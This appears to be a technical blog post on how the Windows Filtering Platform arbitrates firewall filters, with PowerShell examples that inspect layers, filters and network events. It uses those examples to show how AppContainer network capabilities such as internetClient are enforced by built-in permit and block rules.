The end result of the evaluation is whether the operation is permitted or blocked. The behavior of a block depends on the operation. If an outbound connection is blocked the caller is notified. If an inbound connection is blocked the firewall will drop the packets and provide no notification to the peer, such as a TCP Reset or ICMP response. This default drop behavior can be changed through a system wide configuration change. Let's dig into more detail on how the rules are configured for evaluation.

Layers, Sublayers and Filters

The firewall rules are configured using three types of object: layers, sublayers and filters as shown in the following diagram.

Diagram showing the relationship between layers, sublayers and filters. Each layer can have one or more sublayers, each of which in turn has one or more associated filters.

The firewall layer is used to categorize the network operation to be evaluated. For example there are separate layers for inbound and outbound packets. This is typically further differentiated by IP version, so there are separate IPv4 and IPv6 layers for inbound and outbound packets. While the firewall is primarily focussed on IP traffic, there are also a limited number of MAC and Virtual Switch layers to perform specialist firewalling operations. You can find the list of pre-defined layers on MSDN here. As the WFP needs to know which layer handles which operation, there's no way for additional layers to be added to the system by a third-party application.

When a packet is evaluated by a layer the WFP performs Filter Arbitration. This is a set of rules which determine the order of evaluation of the filters. First WFP enumerates all registered filters which are associated with the layer's unique GUID. Next, WFP groups the filters by their sublayer's GUID and orders the filter groupings by a weight value which was specified when the sublayer was registered. Finally, WFP evaluates each filter according to the order based on a weight value specified when the filter was registered.

For every filter, WFP checks if the list of conditions match the packet and its associated meta-data. If the conditions match then the filter performs a specified action, which can be one of the following:

  • Permit
  • Block
  • Callout Terminating
  • Callout Unknown
  • Callout Inspection

If the action is Permit or Block then the filter evaluation for the current sublayer is terminated with that action as the result. If the action is a callout then WFP will invoke the filter's registered callout driver's classify function to perform additional checks. The classify function can evaluate the packet and its meta-data and specify a final result of Permit, Block or additionally Continue which indicates the filter should be ignored. In general if the action is Callout Terminating then it should only set Permit and Block, and if it's Callout Inspection then it should only set Continue. The Callout Unknown action is for callouts which might terminate or might not depending on the result of the classification.

Once a terminating filter has been evaluated WFP stops processing that sublayer. However, WFP will continue to process the remaining sublayers in the same way regardless of the final result. In general if any sublayer returns a Block result then the packet will be blocked, otherwise it'll be permitted. This means that even if a higher priority sublayer's result is Permit, the packet can still be blocked by a lower-priority sublayer.
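The arbitration rules described so far can be sketched in a few lines of Python. This is only a simplified model, not how WFP is implemented: it ignores callouts and "hard" results, the Filter class and classify function are hypothetical names, and it assumes that a higher weight means a higher priority.

```python
from dataclasses import dataclass

PERMIT, BLOCK = "Permit", "Block"

@dataclass
class Filter:
    name: str
    sublayer: str
    weight: int
    action: str           # PERMIT or BLOCK; callouts are left out of this sketch
    matches: bool = True  # stand-in for "all of the filter's conditions matched"

def classify(filters, sublayer_weights):
    """Return (final_action, per_sublayer_results) for a single layer."""
    results = {}
    # Assumption: sublayers and filters with a higher weight are evaluated first.
    for sublayer in sorted(sublayer_weights, key=sublayer_weights.get, reverse=True):
        in_sublayer = [f for f in filters if f.sublayer == sublayer]
        for f in sorted(in_sublayer, key=lambda f: f.weight, reverse=True):
            if f.matches:
                # First matching terminating filter ends this sublayer.
                results[sublayer] = (f.action, f.name)
                break
    # Any Block from any sublayer blocks the packet, otherwise it is permitted.
    final = BLOCK if any(action == BLOCK for action, _ in results.values()) else PERMIT
    return final, results

# Hypothetical sublayers and filters, purely for illustration.
sublayers = {"HIGH": 3, "LOW": 2}
filters = [
    Filter("permit everything", "HIGH", 10, PERMIT),
    Filter("block unknown apps", "LOW", 5, BLOCK),
    Filter("never reached", "LOW", 1, PERMIT),
]
final, per_sublayer = classify(filters, sublayers)
print(final, per_sublayer)
```

In this model the HIGH sublayer permits the packet, but the LOW sublayer is still evaluated and its Block decides the final result.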

A filter can be configured with the FWPM_FILTER_FLAG_CLEAR_ACTION_RIGHT flag, which indicates that the result should be considered “hard”. This allows a higher priority filter to permit a packet in a way which can't be overridden by a lower-priority blocking filter. The rules for the final result are even more complex than I make out, including soft blocks and vetoes. Refer to the page in MSDN for more information.

To simplify the classification of network traffic, WFP provides a set of stateful layers which correspond to major network events such as TCP connection and port binding. The stateful filtering is referred to as Application Layer Enforcement (ALE). For example the FWPM_LAYER_ALE_AUTH_CONNECT_V4 layer will be evaluated when a TCP connection using IPv4 is being made.

For any given connection it will only be evaluated once, not for every packet associated with the TCP connection handshake. In general these ALE layers are the ones we'll focus on when inspecting the firewall configuration, as they're the most commonly used. The three main ALE layers you're going to need to inspect are the following:

Name                                   Description
----                                   -----------
FWPM_LAYER_ALE_AUTH_CONNECT_V4/6       Processed when TCP connect() called.
FWPM_LAYER_ALE_AUTH_LISTEN_V4/6        Processed when TCP listen() called.
FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4/6   Processed when a packet/connection is received.

What layers are used and in what order they are evaluated depend on the specific operation being performed. You can find the list of the layers for TCP packets here and UDP packets here. Now, let's dig into how filter conditions are defined and what information they can check.

Filter Conditions

Each filter contains an optional list of conditions which are used to match a packet. If no list is specified then the filter will always match any incoming packet and perform its defined action. If conditions on more than one field are specified then the filter only matches if all of them match. Multiple conditions on the same field are instead OR'ed together, which allows a single filter to match on multiple values.

Each condition contains three values:

  • The layer field to check.
  • The value to compare against.
  • The match type, for example the packet value and the condition value are equal.
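As a rough illustration of these matching rules, the following Python sketch models a condition as a (field, match type, value) tuple. The function name, the shortened field names and the small set of match types are assumptions made for the example. They are not part of the WFP API.

```python
import operator
from collections import defaultdict

# A few match types, modelled on the FWP_MATCH_* names.
MATCHERS = {
    "Equal": operator.eq,
    "NotEqual": operator.ne,
    "Greater": operator.gt,
    "Less": operator.lt,
    "Range": lambda value, bounds: bounds[0] <= value <= bounds[1],
}

def filter_matches(conditions, fields):
    """conditions: list of (field, match_type, value) tuples.
    fields: dict of the values the layer populated for this packet."""
    if not conditions:
        return True  # no condition list: the filter always matches
    by_field = defaultdict(list)
    for field, match_type, value in conditions:
        by_field[field].append((match_type, value))
    # AND across different fields, OR across conditions on the same field.
    return all(
        field in fields
        and any(MATCHERS[m](fields[field], v) for m, v in group)
        for field, group in by_field.items()
    )

conditions = [
    ("IP_REMOTE_PORT", "Equal", 80),
    ("IP_REMOTE_PORT", "Equal", 443),
    ("IP_PROTOCOL", "Equal", "Tcp"),
]
print(filter_matches(conditions, {"IP_REMOTE_PORT": 443, "IP_PROTOCOL": "Tcp"}))
print(filter_matches(conditions, {"IP_REMOTE_PORT": 443, "IP_PROTOCOL": "Udp"}))
```

The first call matches because one of the two port conditions and the protocol condition are satisfied. The second fails on the protocol alone.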

Each layer has a list of fields that will be populated whenever a filter's conditions are checked. The field might directly reflect a value from the packet, such as the destination IP address or the interface the packet is traversing. Or it could be a metadata value, such as the user identity of the process which created the socket. Some common fields are as follows:

Field Type                           Description
----------                           -----------
FWPM_CONDITION_IP_REMOTE_ADDRESS     The remote IP address.
FWPM_CONDITION_IP_LOCAL_ADDRESS      The local IP address.
FWPM_CONDITION_IP_PROTOCOL           The IP protocol type, e.g. TCP or UDP
FWPM_CONDITION_IP_REMOTE_PORT        The remote protocol port.
FWPM_CONDITION_IP_LOCAL_PORT         The local protocol port.
FWPM_CONDITION_ALE_USER_ID           The user's identity.
FWPM_CONDITION_ALE_REMOTE_USER_ID    The remote user's identity.
FWPM_CONDITION_ALE_APP_ID            The path to the socket's executable.
FWPM_CONDITION_ALE_PACKAGE_ID        The user's AppContainer package SID.
FWPM_CONDITION_FLAGS                 A set of additional flags.
FWPM_CONDITION_ORIGINAL_PROFILE_ID   The source network interface profile.
FWPM_CONDITION_CURRENT_PROFILE_ID    The current network interface profile.

The value to compare against the field can take different values depending on the field being checked. For example the field FWPM_CONDITION_IP_REMOTE_ADDRESS can be compared to IPv4 or IPv6 addresses depending on the layer it's used in. The value can also be a range, allowing a filter to match on an IP address within a bounded set of addresses.

The FWPM_CONDITION_ALE_USER_ID and FWPM_CONDITION_ALE_PACKAGE_ID conditions are based on the access token captured when creating the TCP or UDP socket. The FWPM_CONDITION_ALE_USER_ID condition stores a security descriptor which is used in an access check against the creator's token. If the token is granted access then the condition is considered to match. For FWPM_CONDITION_ALE_PACKAGE_ID the condition checks the package SID of the AppContainer token. If the token is not an AppContainer token then the filtering engine sets the package SID to the NULL SID (S-1-0-0).

The FWPM_CONDITION_ALE_REMOTE_USER_ID is similar to the FWPM_CONDITION_ALE_USER_ID condition but compares against the remote authenticated user. In most cases sockets are not authenticated, however if IPsec is in use that can result in a remote user token being available to compare. It's also used in some higher-level layers such as RPC filters.

The match type can be one of the following:

  • FWP_MATCH_EQUAL
  • FWP_MATCH_EQUAL_CASE_INSENSITIVE
  • FWP_MATCH_FLAGS_ALL_SET
  • FWP_MATCH_FLAGS_ANY_SET
  • FWP_MATCH_FLAGS_NONE_SET
  • FWP_MATCH_GREATER
  • FWP_MATCH_GREATER_OR_EQUAL
  • FWP_MATCH_LESS
  • FWP_MATCH_LESS_OR_EQUAL
  • FWP_MATCH_NOT_EQUAL
  • FWP_MATCH_NOT_PREFIX
  • FWP_MATCH_PREFIX
  • FWP_MATCH_RANGE

The match types should hopefully be self-explanatory based on their names. How the match is interpreted depends on the field's type and the value being used to check against.

Inspecting the Firewall Configuration

We now have an idea of the basics of how WFP works to filter network traffic. Let's look at how to inspect the current configuration. We can't use any of the normal firewall commands or UIs, such as the PowerShell NetSecurity module, because as I already mentioned these represent the Windows Defender view of the firewall.

Instead we need to use the RPC APIs BFE exposes to access the configuration. For example, you can access a filter using the FwpmFilterGetByKey0 API. Note that the BFE maintains security descriptors to restrict access to WFP objects. By default nothing can be accessed by non-administrators, so you'd need to call the RPC APIs while running as an administrator.

You could implement your own tooling to call all the different APIs, but it'd be much easier if someone had already done it for us. For built-in tools the only one I know of is using netsh with the wfp namespace. For example to dump all the currently configured filters you can use the following command as an administrator:

PS> netsh wfp show filters file = -

This will print all filters in an XML format to the console. Be prepared to wait a while for the output to complete. You can also dump straight to a file. Of course you now need to interpret the XML results. It is possible to also specify certain parameters, such as local and remote addresses to reduce the output to only matching filters.

Processing an XML file doesn't sound too appealing. To make the firewall configuration easier to inspect I've added many of the BFE APIs to my NtObjectManager PowerShell module from version 1.1.32 onwards. The module exposes various commands which will return objects representing the current WFP configuration which you can easily use to inspect and group the results however you see fit.

Layer Configuration

Even though the layers are predefined in the WFP implementation it's still useful to be able to query the details about them. For this you can use the Get-FwLayer command.

PS> Get-FwLayer

KeyName                           Name                                    

-------                           ----                                    

FWPM_LAYER_OUTBOUND_IPPACKET_V6   Outbound IP Packet v6 Layer            

FWPM_LAYER_IPFORWARD_V4_DISCARD   IP Forward v4 Discard Layer            

FWPM_LAYER_ALE_AUTH_LISTEN_V4     ALE Listen v4 Layer

...

The output shows the SDK name for the layer, if it has one, and the name of the layer that the BFE service has configured. The layer can be queried by its SDK name, its GUID or a numeric ID, which we will come back to later. As we mostly only care about the ALE layers, there's a special AleLayer parameter to query a specific layer without needing to remember the full name or ID.

PS> (Get-FwLayer -AleLayer ConnectV4).Fields

KeyName                          Type      DataType              

-------                          ----      --------              

FWPM_CONDITION_ALE_APP_ID        RawData   ByteBlob              

FWPM_CONDITION_ALE_USER_ID       RawData   TokenAccessInformation

FWPM_CONDITION_IP_LOCAL_ADDRESS  IPAddress UInt32                

...

Each layer exposes the list of fields which represent the conditions which can be checked in that layer. You can access the list through the Fields property. The output shown above contains a few of the condition types we saw earlier in the table of conditions. The output also shows the type of the condition and the data type you should provide when filtering on that condition.

PS> Get-FwSubLayer | Sort-Object Weight | Select KeyName, Weight

KeyName                                   Weight

-------                                   ------

FWPM_SUBLAYER_INSPECTION                       0

FWPM_SUBLAYER_TEREDO                           1

MICROSOFT_DEFENDER_SUBLAYER_FIREWALL           2

MICROSOFT_DEFENDER_SUBLAYER_WSH                3

MICROSOFT_DEFENDER_SUBLAYER_QUARANTINE         4            

...

You can also inspect the sublayers in the same way, using the Get-FwSubLayer command as shown above. The most useful information from the sublayer is the weight. As mentioned earlier this is used to determine the ordering of the associated filters. However, as we'll see you rarely need to query the weight yourself.

Filter Configuration

Enforcing the firewall rules is up to the filters. You can enumerate all filters using the Get-FwFilter command.

PS> Get-FwFilter

FilterId ActionType Name

-------- ---------- ----

68071    Block     Boot Time Filter

71199    Permit    @FirewallAPI.dll,-80201

71350    Block     Block inbound traffic to dmcertinst.exe

...

The default output shows the ID of a filter, the action type and the user defined name. The filter objects returned also contain the layer and sublayer identifiers as well as the list of matching conditions for the filter. As inspecting the filter is going to be the most common operation the module provides the Format-FwFilter command to format a filter object in a more readable format.

PS> Get-FwFilter -Id 71350 | Format-FwFilter

Name       : Block inbound traffic to dmcertinst.exe

Action Type: Block

Key        : c391b53a-1b98-491c-9973-d86e23ea8a84

Id         : 71350

Description:

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : Indexed

Weight     : 549755813888

Conditions :

FieldKeyName              MatchType Value

------------              --------- -----

FWPM_CONDITION_ALE_APP_ID Equal     \device\harddiskvolume3\windows\system32\dmcertinst.exe

The formatted output contains the layer and sublayer information, the assigned weight of the filter and the list of conditions. The layer is FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 which handles new incoming connections. The sublayer is MICROSOFT_DEFENDER_SUBLAYER_WSH which is used to group Windows Service Hardening rules which apply regardless of the normal firewall configuration.

In this example the filter only matches on the path of the socket creator process's executable. If the filter matches, the end result is that the IPv4 TCP network connection is blocked at the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. As already mentioned, once the block is enforced it won't matter if a lower priority sublayer would permit the connection.

How can we determine the ordering of sublayers and filters? You could manually extract the weights for each sublayer and filter and try and order them, and hopefully the ordering you come up with matches what WFP uses. A much simpler approach is to specify a flag when enumerating filters for a particular layer to request the BFE APIs sort the filters using the canonical ordering.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted

FilterId ActionType     Name

-------- ----------     ----

65888    Permit         Interface Un-quarantine filter

66469    Block          AppContainerLoopback

66467    Permit         AppContainerLoopback

66473    Block          AppContainerLoopback

...

The Sorted parameter specifies the flag to sort the filters. You can now go through the list of filters in order and try and work out what would be the matched filter based on some criteria you decide on. Again it'd be helpful if we could get the BFE service to do more of the hard work in figuring out what rules would apply given a particular process. For this we can specify some of the metadata that represents the connection being made and get the BFE service to only return filters which match on their conditions.

PS> $template = New-FwFilterTemplate -AleLayer ConnectV4 -Sorted

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

65

PS> Add-FwCondition $template -ProcessId $pid

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> Add-FwCondition $template -IPAddress $addr.Address -Port 80

PS> Add-FwCondition $template -ProtocolType Tcp

PS> Add-FwCondition $template -ConditionFlags 0

PS> $template.Conditions

FieldKeyName                     MatchType Value                                                                    

------------                     --------- -----                                                                    

FWPM_CONDITION_ALE_APP_ID        Equal     \device\harddisk...

FWPM_CONDITION_ALE_USER_ID       Equal     FirewallTokenInformation                        

FWPM_CONDITION_ALE_PACKAGE_ID    Equal     S-1-0-0

FWPM_CONDITION_IP_REMOTE_ADDRESS Equal     142.250.72.196

FWPM_CONDITION_IP_REMOTE_PORT    Equal     80

FWPM_CONDITION_IP_PROTOCOL       Equal     Tcp

FWPM_CONDITION_FLAGS             Equal     None

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

2

To specify the metadata we need to create an enumeration template using the New-FwFilterTemplate command. We specify the Connect IPv4 layer as well as requesting that the results are sorted. Using this template with the Get-FwFilter command returns 65 results (on my machine).

Next we add some metadata, starting with the current PowerShell process. This populates the App ID with the executable path as well as token information such as the user ID and package ID of an AppContainer. We then add details about the target connection request, specifying a TCP connection to www.google.com on port 80. Finally we add some condition flags. We'll come back to these flags later.

Using this new template results in only 2 filters whose conditions will match the metadata. Of course depending on your current configuration the number might be different. In this case 2 filters is much easier to understand than 65. If we format those two filters we see the following:

PS> $fs | Format-FwFilter

Name       : Default Outbound

Action Type: Permit

Key        : 07ba2a96-0364-4759-966d-155007bde926

Id         : 67989

Description: Default Outbound

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : None

Weight     : 9223372036854783936

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public    

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

Name       : Default Outbound

Action Type: Permit

Key        : 36da9a47-b57d-434e-9345-0e36809e3f6a

Id         : 67993

Description: Default Outbound

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : None

Weight     : 3458764513820540928

Both filters permit the connection and, based on their name, they're the default backstop when no other filters match. It's possible to configure each network profile with different default backstops. In this case the default is to permit outbound traffic. We have two of them because both match all the metadata we provided, although if we'd specified a profile other than Public then we'd only get a single filter.

Can we prove that this is the filter which matches a TCP connection? Fortunately we can: WFP supports gathering network events related to the firewall. An event includes the filter which permitted or denied the network request, and we can then compare it to our two filters to see if one of them matched. You can use the Get-FwNetEvent command to read the current circular buffer of events.

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $s = [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $ev_temp = New-FwNetEventTemplate -Condition $template.Conditions

PS> Add-FwCondition $ev_temp -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $ev_temp | Format-List

FilterId        : 67989

LayerId         : 48

ReauthReason    : 0

OriginalProfile : Public

CurrentProfile  : Public

MsFwpDirection  : 0

IsLoopback      : False

Type            : ClassifyAllow

Flags           : IpProtocolSet, LocalAddrSet, RemoteAddrSet, ...

Timestamp       : 8/5/2021 11:24:41 AM

IPProtocol      : Tcp

LocalEndpoint   : 10.0.0.101:63046

RemoteEndpoint  : 142.250.72.196:80

ScopeId         : 0

AppId           : \device\harddiskvolume3\windows\system32\wind...

UserId          : S-1-5-21-4266194842-3460360287-487498758-1103

AddressFamily   : Inet

PackageSid      : S-1-0-0

First we enable the ClassifyAllow event, which is generated when a firewall event is permitted. By default only firewall blocks are recorded using the ClassifyDrop event to avoid filling the small network event log with too much data. Next we make a connection to the Google web server we queried earlier to generate an event. We then disable the ClassifyAllow events again to reduce the risk we'll lose the event.

Next we can query for the current stored events using Get-FwNetEvent. To limit the network events returned to us we can specify a template in a similar way to when we queried for filters. In this case we create a new template using the New-FwNetEventTemplate command and copy the existing conditions from our filter template. We then add a condition to match on only ClassifyAllow events.

Formatting the results we can see the network connection event to TCP port 80. Crucially, if you compare the FilterId value to the Id fields of the two enumerated filters, the event matches the first filter (67989). This gives us confidence that we have a basic understanding of how the filtering works. Let's move on to running some tests to determine how the AppContainer network restrictions are implemented through WFP.

It's worth noting at this point that the network event buffer can be small, of the order of 30-40 events depending on load, so on a busy server events might be lost before you query for them. You can get a real-time trace of events by using the Start-FwNetEventListener command to avoid losing events.
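To see why events go missing, here is a minimal Python model of a fixed-size circular buffer. The capacity of 32 is just a value picked from the 30-40 range mentioned above, and the function is hypothetical. It says nothing about how BFE actually stores events.

```python
from collections import deque

def record_events(capacity, events):
    """Keep only the most recent `capacity` events, like a circular buffer."""
    buffer = deque(maxlen=capacity)
    for event in events:
        buffer.append(event)  # once full, the oldest entry is silently dropped
    return list(buffer)

# 100 events arrive before we get a chance to query a 32-entry buffer.
remaining = record_events(32, range(100))
print(len(remaining), remaining[0], remaining[-1])
```

Only the last 32 events survive, so an event of interest generated early on a busy machine may already be gone by the time Get-FwNetEvent is called.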

Callout Drivers

As mentioned, a developer can implement their own custom functionality to inspect and modify network traffic. This functionality is used by various products, ranging from AV scanning your network traffic for badness to Nmap's Npcap capturing loopback traffic.

To set up a callout the developer needs to do two things. First they need to register the callout's callback functions using the FwpsCalloutRegister API in the kernel driver. Second they need to create a filter that uses the callout by specifying the calloutKey GUID in the filter's action along with one of the action types which invoke a callout.

You can query the list of registered callouts using the FwpmCalloutEnum0 API in user-mode. I expose this API through the Get-FwCallout command.

PS> Get-FwCallout | Sort CalloutId | Select CalloutId, KeyName

CalloutId KeyName

--------- -------

        1 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V4

        2 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V6

        3 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V4

        4 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V6

        5 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V4

        6 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V6

...

The above output shows the callouts listed by their callout ID numbers. The ID number is key to finding the callback functions in the kernel. There doesn't seem to be a way of enumerating the addresses of callout functions directly (at least from user mode). This article shows a basic approach to extract the callback functions using a kernel debugger, although it's a little out of date.

The NETIO driver stores all registered callbacks in a large array, the index being the callout ID. If you want to find a specific callout then find the base of the array using the description in the article, then calculate the offset based on the size of a single callout structure and the index. For example on Windows 10 21H1 x64 the following command will dump a callout's classify callback function. Replace N with the callout ID. The magic numbers 198 and 50 are the offset into the gWfpGlobal global data table and the size of a callout entry respectively, which you can discover through analyzing the code.

0: kd> ln poi(poi(poi(NETIO!gWfpGlobal)+198)+(50*N)+10)
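The arithmetic inside the command above can be written out as a short Python sketch. It assumes the numbers are hexadecimal (the debugger's default radix) and that the trailing 10 is the offset of the classify function pointer inside a callout entry. The function names and the example base address are hypothetical.

```python
# Values taken from the kd command, read as hexadecimal.
GLOBAL_TABLE_OFFSET = 0x198  # offset of the callout array pointer in gWfpGlobal data
CALLOUT_ENTRY_SIZE = 0x50    # size of a single callout entry
CLASSIFY_FN_OFFSET = 0x10    # assumed offset of the classify pointer in an entry

def callout_slot_offset(callout_id):
    """Offset from the array base to the pointer the command dereferences."""
    return CALLOUT_ENTRY_SIZE * callout_id + CLASSIFY_FN_OFFSET

def classify_pointer_address(array_base, callout_id):
    """Address holding the classify callback pointer for a callout ID."""
    return array_base + callout_slot_offset(callout_id)

# Hypothetical array base, purely to show the calculation for callout ID 5.
print(hex(callout_slot_offset(5)))
print(hex(classify_pointer_address(0xFFFF800012340000, 5)))
```

These offsets are specific to the build mentioned in the text and would need to be rediscovered for other versions of NETIO.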

If you're in kernel mode there's an undocumented KfdGetRefCallout function (and a corresponding KfdDeRefCallout to decrement the reference) exported by NETIO which will return a pointer to the internal callout structure based on the ID avoiding the need to extract the offsets from disassembly.

AppContainer Network Restrictions

The basics of accessing the network from an AppContainer sandbox are documented by Microsoft. Specifically the lowbox token used for the sandbox needs to have one or more capabilities enabled to grant access to the network. The three capabilities are:

  • internetClient - Grants client access to the Internet
  • internetClientServer - Grants client and server access to the Internet
  • privateNetworkClientServer - Grants client and server access to local private networks.

Client Capabilities

Pretty much all Windows Store applications are granted the internetClient capability as accessing the Internet is a thing these days. Even the built-in calculator has this capability, presumably so you can fill in feedback on how awesome a calculator it is.

Image showing the list of capabilities granted to Windows calculator application showing the “Your Internet Connection” capability is granted.

However, this shouldn't grant the ability to act as a network server. For that you need the internetClientServer capability. Note that Windows defaults to blocking incoming connections, so having the server capability still doesn't ensure you can receive network connections. The final capability is privateNetworkClientServer which grants access to private networks as both a client and a server. What is the internet and what is private isn't made immediately clear. Hopefully we'll find out from inspecting the firewall configuration.

PS> $token = Get-NtToken -LowBox -PackageSid TEST

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> $sock = Invoke-NtToken $token {

>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

Exception calling ".ctor" with "2" argument(s): "An attempt was made to access a socket in a way forbidden by its access permissions 216.58.194.164:80"

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyDrop

PS> Get-FwNetEvent -Template $template | Format-List

FilterId               : 71079

LayerId                : 48

ReauthReason           : 0

...

PS> Get-FwFilter -Id 71079 | Format-FwFilter

Name       : Block Outbound Default Rule

Action Type: Block

Key        : fb8f5cab-1a15-4616-b63f-4a0d89e527f8

Id         : 71079

Description: Block Outbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 274877906944

Conditions :

FieldKeyName                  MatchType Value

------------                  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID NotEqual  NULL SID

In the above output we first create a lowbox token for testing the AppContainer access. In this example we don't provide any capabilities for the token so we're expecting the network connection should fail. Next we connect a TcpClient socket while impersonating the lowbox token, and the connection is immediately blocked with an error.

We then get the network event corresponding to the connection request to see what filter blocked the connection. Formatting the filter from the network event we find the “Block Outbound Default Rule”. Based on the FWPM_CONDITION_ALE_PACKAGE_ID condition, this will block any AppContainer network connection which hasn't been permitted by higher priority firewall filters.

Like with the “Default Outbound” filter we saw earlier, this is a backstop if nothing else matches. Unlike that earlier filter the default is to block rather than permit the connection. Another thing to note is the sublayer name. For “Block Outbound Default Rule” it's MICROSOFT_DEFENDER_SUBLAYER_WSH, which is used for built-in filters which aren't directly visible from the Defender firewall configuration. In contrast, “Default Outbound” uses MICROSOFT_DEFENDER_SUBLAYER_FIREWALL, which is a lower priority sublayer (based on its weight) and thus would never be evaluated due to the higher priority block.

Okay, we know how connections are blocked. Therefore there must be a higher priority filter which permits the connection within the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. We could go back to manual inspection, but we might as well just see what the network event shows as the matching filter when we grant the internetClient capability.

PS> $cap = Get-NtSid -KnownSid CapabilityInternetClient

PS> $token = Get-NtToken -LowBox -PackageSid TEST -CapabilitySid $cap

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $sock = Invoke-NtToken $token {

>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $template | Format-List

FilterId        : 71075

LayerId         : 48

ReauthReason    : 0

...

PS> Get-FwFilter -Id 71075 | Format-FwFilter

Name       : InternetClient Default Rule

Action Type: Permit

Key        : 406568a7-a949-410d-adbb-2642ec3e8653

Id         : 71075

Description: InternetClient Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 412316868544

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range     Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

FWPM_CONDITION_ALE_USER_ID         Equal     O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)

In this example we create a new token using the same package SID but with internetClient capability. When we connect the socket we now no longer get an error and the connection is permitted. Checking for the ClassifyAllow event we find the “InternetClient Default Rule” filter matched the connection.
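The two filter weights we've seen in the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer explain why the permit wins. The following Python sketch simply sorts the two filters by the weights from the Format-FwFilter output, assuming that a higher weight is evaluated first. The evaluation_order helper is a hypothetical name.

```python
# (name, action, weight) as reported by Format-FwFilter for the WSH sublayer.
wsh_filters = [
    ("Block Outbound Default Rule", "Block", 274877906944),
    ("InternetClient Default Rule", "Permit", 412316868544),
]

def evaluation_order(filters):
    """Assumption: filters with a higher weight are evaluated first."""
    return sorted(filters, key=lambda f: f[2], reverse=True)

for name, action, weight in evaluation_order(wsh_filters):
    print(f"{weight:>14} {action:<6} {name}")
```

With the internetClient capability present, the permit filter matches first and terminates the sublayer before the blocking backstop is reached.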

Looking at the conditions we can see that it will only match if the socket creator is in an AppContainer, based on the FWPM_CONDITION_ALE_PACKAGE_ID condition. The FWPM_CONDITION_ALE_USER_ID condition also ensures that it will only match if the creator has the internetClient capability, which is S-1-15-3-1 in the SDDL format. This filter is what's granting access to the network.
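
To make the user ID condition a little more concrete, here is a small Python sketch (not part of the PowerShell tooling used in this post) that pulls the ACEs out of the SDDL string shown in the filter and reports which capability SIDs it grants a match to. The helper names are made up for illustration, and the parser only handles the simple ACE form seen in this output; it is not a general SDDL parser.

```python
import re

# Capability SIDs named in this post, mapped to their capability names.
KNOWN_CAPABILITIES = {
    "S-1-15-3-1": "internetClient",
    "S-1-15-3-2": "internetClientServer",
    "S-1-15-3-3": "privateNetworkClientServer",
}


def parse_aces(sddl):
    """Return (ace_type, rights, trustee) for each parenthesised ACE."""
    aces = []
    for body in re.findall(r"\(([^)]*)\)", sddl):
        # ACE layout: type;flags;rights;object_guid;inherit_object_guid;trustee
        fields = body.split(";")
        aces.append((fields[0], fields[2], fields[5]))
    return aces


def capabilities_granted(sddl):
    """List the known capability names that appear as ACE trustees."""
    return [
        KNOWN_CAPABILITIES[trustee]
        for _, _, trustee in parse_aces(sddl)
        if trustee in KNOWN_CAPABILITIES
    ]


sddl = "O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)"
print(parse_aces(sddl))
print(capabilities_granted(sddl))
```

The WD (Everyone) and AN (Anonymous Logon) entries show up as ordinary trustees; only the capability SID distinguishes this filter from the ones for the other network capabilities.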

